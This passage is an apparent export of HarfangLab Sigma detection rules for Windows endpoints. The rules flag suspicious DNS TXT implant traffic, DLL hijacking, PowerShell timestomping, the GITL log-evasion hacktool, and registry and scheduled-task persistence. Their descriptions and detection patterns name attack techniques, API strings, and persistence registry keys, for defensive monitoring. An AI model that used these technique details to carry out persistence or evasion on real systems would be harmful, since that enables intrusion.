"content": "title: Suspicious TXT DNS Resolution (Windows)\nid: 90c34db9-cb9c-454f-a5d1-d38abba9b4cc\ndescription: |\n Detects a suspicious TXT DNS request that could be related to an implant communication.\n Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\n It is recommended to analyze the process at the origin of the request for malicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2024/03/28\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryType: 'TXT'\n QueryStatusCategory: 'success'\n TextRecords|contains: \"?\"\n QueryName|contains: '.' # DNS domain MUST contain a ., otherwise it is a local name\n\n filter_mail:\n TextRecords|contains:\n - 'v=DKIM1'\n - 'v=spf1'\n - 'k=rsa'\n - 'v=DMARC1'\n\n filter_site_verification:\n TextRecords|contains:\n - 'apple-domain-verification='\n - 'google-site-verification='\n - 'facebook-domain-verification='\n - 'adobe-idp-site-verification='\n - 'MS=ms????????'\n\n filter_know_requested_name:\n QueryName|endswith:\n - '.local' # ignore local DNS\n - 'whoami.cloudflare.com'\n - 'o-o.myaddr.l.google.com'\n - '.psbl.surriel.com' # Passive spam blocklist\n - '.cbl.abuseat.org' # The Abuseat CBL (Composite Blocking List)\n - '._segment._tcp.steelseries.com'\n - 'config.nos.avast.com.'\n - 'config.nos.avast.com'\n - '_nos._tcp.nos.avast.com.'\n - '_nos._tcp.nos.avast.com'\n - '.nos-avg.cz.' # Norton, Avast, AVG, ...\n - '.nos-avg.cz' # Norton, Avast, AVG, ...\n - '.logmein-gateway.com.'\n - '.logmein-gateway.com'\n - 'xmbc.highrez.co.uk' # some tool to manage mouse buttons\n - 'ingress.cloudflare-ipfs.com'\n - '.argotunnel.com' # Cloudflare tunnel client\n - '_dnsaddr.bootstrap.libp2p.io'\n - 'account.filemaker-cloud.com'\n - '.mongodb.net'\n - '.trellix.com' # McAfee\n - 'current.cvd.clamav.net.'\n - 'current.cvd.clamav.net'\n - 'push.apple.com'\n - '.kmaxcdn.com'\n - '.hotmail.com'\n - 'feed.snipaste.com'\n - '.gpsoft.com.au'\n - 'minatec.wisper.infra-??.cw-wisper.com'\n - 'releaseversion.ghisler.com'\n\n filter_amazon_ses:\n # xxx._domainkey.yyy.com , type TXT, redirects through a CNAME to xxx.dkip.amazonses.com\n QueryName: '????????????????????????????????._domainkey.*'\n TextRecords: 'p=MI*' # contains a public key\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_dnscache:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k NetworkService -p -s Dnscache'\n\n exclusion_svchost_sharedaccess:\n ProcessCommandLine: '?:\\Windows\\System32\\svchost.exe -k netsvcs -p -s SharedAccess'\n\n exclusion_ipconfig:\n ProcessCommandLine: '?:\\windows\\System32\\ipconfig.exe /displaydns'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_torrent:\n ProcessDescription: 'µTorrent'\n ProcessSigned: 'true'\n ProcessSignature: 'BitTorrent Inc'\n\n exclusion_bravebrowser:\n ProcessSigned: 'true'\n ProcessSignature: 'Brave Software, Inc.'\n\n exclusion_bimi1:\n QueryName|contains: '._bimi.'\n QueryResults|contains|all:\n - '16 v=BIMI1;'\n - 'a=http'\n - 'l=http'\n\n exclusion_securitygateway:\n ProcessImage|endswith: '\\SecurityGateway\\App\\SecurityGateway.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'MDaemon Technologies, Ltd.'\n\n exclusion_gpsoft:\n ProcessImage|endswith: '\\DirectoryOpusPortable\\App\\Directory Opus\\dopus.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'GP Software (Redbrook Pty Ltd)'\n\n exclusion_dkim:\n TextRecords|contains:\n - 'p=MIGf'\n - 'p= MIGf'\n - 'p=MIIBIj'\n - 'p= MIIBIj'\n QueryName|contains: '._domainkey.'\n\n exclusion_dmarc:\n TextRecords|contains: 'ruf=mailto:'\n QueryName|contains: '_dmarc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90c34db9-cb9c-454f-a5d1-d38abba9b4cc",
"rule_name": "Suspicious TXT DNS Resolution (Windows)",
"rule_description": "Detects a suspicious TXT DNS request that could be related to an implant communication.\nAdversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\nIt is recommended to analyze the process at the origin of the request for malicious activities.\n",
"rule_creation_date": "2024-03-28",
"rule_modified_date": "2026-01-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90c6740d-685d-400b-885f-04d7a447a338",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082673Z",
"creation_date": "2026-03-23T11:45:34.082676Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082680Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertieshardware.yml",
"content": "title: DLL Hijacking via systempropertieshardware.exe\nid: 90c6740d-685d-400b-885f-04d7a447a338\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertieshardware.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertieshardware.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90c6740d-685d-400b-885f-04d7a447a338",
"rule_name": "DLL Hijacking via systempropertieshardware.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertieshardware.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "90ca0fdc-affa-4d5e-a5f1-ce8a843ed720",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620336Z",
"creation_date": "2026-03-23T11:45:34.620338Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620342Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/revisiting-ttps-timestomper-622d4c28a655",
"https://github.com/guardicore/monkey/blob/release/1.13.0/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.ps1",
"https://github.com/mitre-attack/attack-arsenal/blob/c056b51942ffae1d0f3416cd14f14f8795d74c16/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1",
"https://attack.mitre.org/techniques/T1070/006/"
],
"name": "t1070_006_powershell_timestomp.yml",
"content": "title: Possible Timestomp via PowerShell\nid: 90ca0fdc-affa-4d5e-a5f1-ce8a843ed720\ndescription: |\n Detects an attempt at timestomping via PowerShell.\n Timestomping consists in changing the modify file time attributes to hide changes to existing files.\n It is recommended to investigate the PowerShell script that performed the timestomp to look for other potential malicious actions.\nreferences:\n - https://posts.specterops.io/revisiting-ttps-timestomper-622d4c28a655\n - https://github.com/guardicore/monkey/blob/release/1.13.0/monkey/infection_monkey/post_breach/timestomping/windows/timestomping.ps1\n - https://github.com/mitre-attack/attack-arsenal/blob/c056b51942ffae1d0f3416cd14f14f8795d74c16/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1\n - https://attack.mitre.org/techniques/T1070/006/\ndate: 2022/01/25\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n # Win32 APIs\n - 'SetFileTime'\n - 'SetFileInformationByHandle'\n - 'NtSetInformationFile'\n\n # PowerShell + .NET APIs\n - '.LastWriteTime='\n - '.LastWriteTime ='\n - 'SetLastAccessTime'\n - 'SetLastWriteTime'\n\n exclusion_signed:\n Signed: 'true'\n\n exclusion_programfiles:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_fp:\n PowershellCommand|contains:\n - '([System.IO.FileInfo]$FilePath).LastWriteTime = [datetime]$UriLastModified'\n - '(Get-ChildItem -LiteralPath $path).LastWriteTime = Get-Date'\n\n # C:\\Program 
Files\\WindowsPowerShell\\Modules\\Posh-SSH\\3.0.1\\Posh-SSH.psm1\n exclusion_posh:\n PowershellCommand|contains:\n - 'if (Test-SFTPPath -SFTPSession $session -Path $Path)'\n - '$currentAttrib.LastWriteTime = $LastWriteTime'\n - '# .ExternalHelp Posh-SSH.psm1-Help.xml'\n - 'function New-SFTPSymlink'\n\n # https://github.com/romero126/PS1C/blob/master/example_provider.cs\n exclusion_ps1c:\n PowershellCommand|contains|all:\n - 'function PSSetFileMetadata'\n - '$item = Microsoft.PowerShell.Management\\get-item $metaDataFilePath -ea SilentlyContinue -Force'\n - 'if ($metaDataToSet[?LastWriteTimeUtc?])'\n - '$item.LastWriteTimeUtc = $metaDataToSet[?LastWriteTimeUtc?]'\n\n exclusion_eagetmail:\n PowershellCommand|contains|all:\n - 'Get-ChildItem $installPath -Include EAGetMail*.dll, EAGetMail*.winmd -recurse'\n - 'New-Item -Path $timeToInstall -ItemType file -Force -ErrorAction Ignore > $null'\n - 'If(Test-Path $timeToInstall -PathType Leaf){'\n\n exclusion_senseir1:\n ProcessParentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\DataCollection\\\\*.ps1'\n\n exclusion_altiris:\n ProcessGrandparentImage: '?:\\Program Files\\Altiris\\Altiris Agent\\AeXNSAgent.exe'\n\n exclusion_defender:\n - ProcessGrandparentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\DataCollection\\\\*\\\\*.ps1'\n\n exclusion_lgpn:\n ProcessCommandLine|startswith: 'powershell.exe -command import-module lgpn;'\n\n exclusion_novell:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\handlers\\runscriptenf.exe'\n\n exclusion_perl:\n ProcessParentImage: '?:\\WINAPP64\\Perl64\\bin\\perl.exe'\n\n exclusion_schedule:\n - ProcessParentImage:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - 
'?:\\Windows\\System32\\taskeng.exe'\n - ProcessGrandparentImage:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\Windows\\System32\\taskeng.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "90ca0fdc-affa-4d5e-a5f1-ce8a843ed720",
"rule_name": "Possible Timestomp via PowerShell",
"rule_description": "Detects an attempt at timestomping via PowerShell.\nTimestomping consists in changing the modify file time attributes to hide changes to existing files.\nIt is recommended to investigate the PowerShell script that performed the timestomp to look for other potential malicious actions.\n",
"rule_creation_date": "2022-01-25",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "910bcf36-de58-4e15-a006-15c66e7cab0b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084141Z",
"creation_date": "2026-03-23T11:45:34.084143Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084148Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/bats3c/Ghost-In-The-Logs",
"https://attack.mitre.org/techniques/T1562/002/"
],
"name": "t1562_002_launch_gitl.yml",
"content": "title: Ghost In The Logs (GITL) HackTool Executed\nid: 910bcf36-de58-4e15-a006-15c66e7cab0b\ndescription: |\n Detects the execution of Ghost In The Logs (GITL), a security evasion toolkit.\n GITL is a malicious tool specifically designed to bypass security monitoring by manipulating Sysmon configurations and Windows Event Logging. Attackers use it to hide their activities and maintain stealth during operations.\n It is recommended to investigate for signs of logging disruption, suspicious process creations, and verify the integrity of your logs.\nreferences:\n - https://github.com/bats3c/Ghost-In-The-Logs\n - https://attack.mitre.org/techniques/T1562/002/\ndate: 2021/04/08\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.GITL\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\gitl.exe'\n - OriginalFileName: 'gitl.exe'\n selection_cmd:\n - CommandLine|contains:\n - ' enable'\n - ' disable'\n - ' load'\n - ' clean'\n - ' status'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "910bcf36-de58-4e15-a006-15c66e7cab0b",
"rule_name": "Ghost In The Logs (GITL) HackTool Executed",
"rule_description": "Detects the execution of Ghost In The Logs (GITL), a security evasion toolkit.\nGITL is a malicious tool specifically designed to bypass security monitoring by manipulating Sysmon configurations and Windows Event Logging. Attackers use it to hide their activities and maintain stealth during operations.\nIt is recommended to investigate for signs of logging disruption, suspicious process creations, and verify the integrity of your logs.\n",
"rule_creation_date": "2021-04-08",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "910f6712-e34f-40b2-8fa7-0c1a7e4ca68f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072359Z",
"creation_date": "2026-03-23T11:45:34.072361Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072366Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/htmlhelpauthor.html",
"https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_html_help_author.yml",
"content": "title: Possible HtmlHelp Author CHM Persistence Added\nid: 910f6712-e34f-40b2-8fa7-0c1a7e4ca68f\ndescription: |\n Detects the edition of the HtmlHelp Author registry key.\n This method is used as a means to achieve persistence by putting a malicious DLL as a .chm helper. The DLL is loaded when a .chm file is opened.\n It is recommended to create a File Acquisition job to download the DLL and analyze it for malicious behavior.\nreferences:\n - https://persistence-info.github.io/Data/htmlhelpauthor.html\n - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\HtmlHelp Author\\Location'\n\n is_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not is_empty\nlevel: medium\n#level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "910f6712-e34f-40b2-8fa7-0c1a7e4ca68f",
"rule_name": "Possible HtmlHelp Author CHM Persistence Added",
"rule_description": "Detects the edition of the HtmlHelp Author registry key.\nThis method is used as a means to achieve persistence by putting a malicious DLL as a .chm helper. The DLL is loaded when a .chm file is opened.\nIt is recommended to create a File Acquisition job to download the DLL and analyze it for malicious behavior.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "911369b2-1f0e-4f72-bccf-22e1cf3fb1e2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626921Z",
"creation_date": "2026-03-23T11:45:34.626923Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626927Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cybertriage.com/blog/windows-scheduled-tasks-for-dfir-investigations/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_suspicious_scheduled_task_params.yml",
"content": "title: Suspiciously Named Hidden Scheduled Task Created Remotely\nid: 911369b2-1f0e-4f72-bccf-22e1cf3fb1e2\ndescription: |\n Detects the creation or update of a scheduled task commonly associated with hacking tools such as NetExec.\n Threat actors may choose to execute their code by creating scheduled tasks on remote systems as a way to create persistence, escalate privileges and evade defenses.\n It is recommended to click the \"Task Information\" button and investigate the contents of the scheduled task thoroughly to determine maliciousness, as well as to investigate any surrounding activity.\nreferences:\n - https://www.cybertriage.com/blog/windows-scheduled-tasks-for-dfir-investigations/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/11/20\nmodified: 2026/02/09\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType:\n - 'create'\n - 'update'\n\n IsRemote: 'true'\n SessionLogonType: 3\n TaskHidden: 'true'\n TaskName:\n - '\\\\?'\n - '\\\\??'\n - '\\\\???'\n - '\\\\????'\n - '\\\\?????'\n - '\\\\??????'\n - '\\\\???????'\n - '\\\\????????'\n - '\\\\?????????'\n - '\\\\??????????'\n - '\\\\???????????'\n - '\\\\????????????'\n - '\\\\?????????????'\n - '\\\\??????????????'\n - '\\\\???????????????'\n - '\\\\????????????????'\n\n exclusion_ccleaner:\n TaskName: '\\CCleaner Update'\n FirstActionCommandLine:\n - '?:\\Program Files\\CCleaner\\CCUpdate.exe'\n - '?:\\Program Files\\CCleaner\\CCUpdate.exe '\n - '?:\\CCUpdate.exe'\n - '?:\\CCUpdate.exe '\n\n exclusion_amdlink_update:\n TaskName: '\\AMDLinkUpdate'\n FirstActionCommandLine: '?:\\Program Files\\AMD\\CIM\\Bin64\\InstallManagerApp.exe -AMDLinkUpdate'\n\n 
exclusion_audittool:\n TaskName: '\\audittool??'\n FirstActionCommandLine|endswith: '\\audit_tool_x64.exe '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "911369b2-1f0e-4f72-bccf-22e1cf3fb1e2",
"rule_name": "Suspiciously Named Hidden Scheduled Task Created Remotely",
"rule_description": "Detects the creation or update of a scheduled task commonly associated with hacking tools such as NetExec.\nThreat actors may choose to execute their code by creating scheduled tasks on remote systems as a way to create persistence, escalate privileges and evade defenses.\nIt is recommended to click the \"Task Information\" button and investigate the contents of the scheduled task thoroughly to determine maliciousness, as well as to investigate any surrounding activity.\n",
"rule_creation_date": "2025-11-20",
"rule_modified_date": "2026-02-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "913fc831-7436-4351-96d1-a753786a73e6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080742Z",
"creation_date": "2026-03-23T11:45:34.080744Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080748Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cyberark.com/resources/threat-research-blog/persistence-techniques-that-persist",
"https://persistence-info.github.io/Data/bootverificationprogram.html",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_bootverificationprogram_persistence.yml",
"content": "title: Persistence via Boot Verification Program Added\nid: 913fc831-7436-4351-96d1-a753786a73e6\ndescription: |\n Detects when a new boot verification program is added using the registry.\n Microsoft allows users to define a custom boot verification program by creating a specific registry key.\n The Service Control Manager (\"services.exe\") will execute the boot verification program at each boot.\n It is recommended to investigate the process that modified the registry and the value details for suspicious activities.\nreferences:\n - https://www.cyberark.com/resources/threat-research-blog/persistence-techniques-that-persist\n - https://persistence-info.github.io/Data/bootverificationprogram.html\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2024/11/12\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\BootVerificationProgram\\ImagePath'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "913fc831-7436-4351-96d1-a753786a73e6",
"rule_name": "Persistence via Boot Verification Program Added",
"rule_description": "Detects when a new boot verification program is added using the registry.\nMicrosoft allows users to define a custom boot verification program by creating a specific registry key.\nThe Service Control Manager (\"services.exe\") will execute the boot verification program at each boot.\nIt is recommended to investigate the process that modified the registry and the value details for suspicious activities.\n",
"rule_creation_date": "2024-11-12",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9146b63f-6436-4d09-a566-f5662dbf44bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
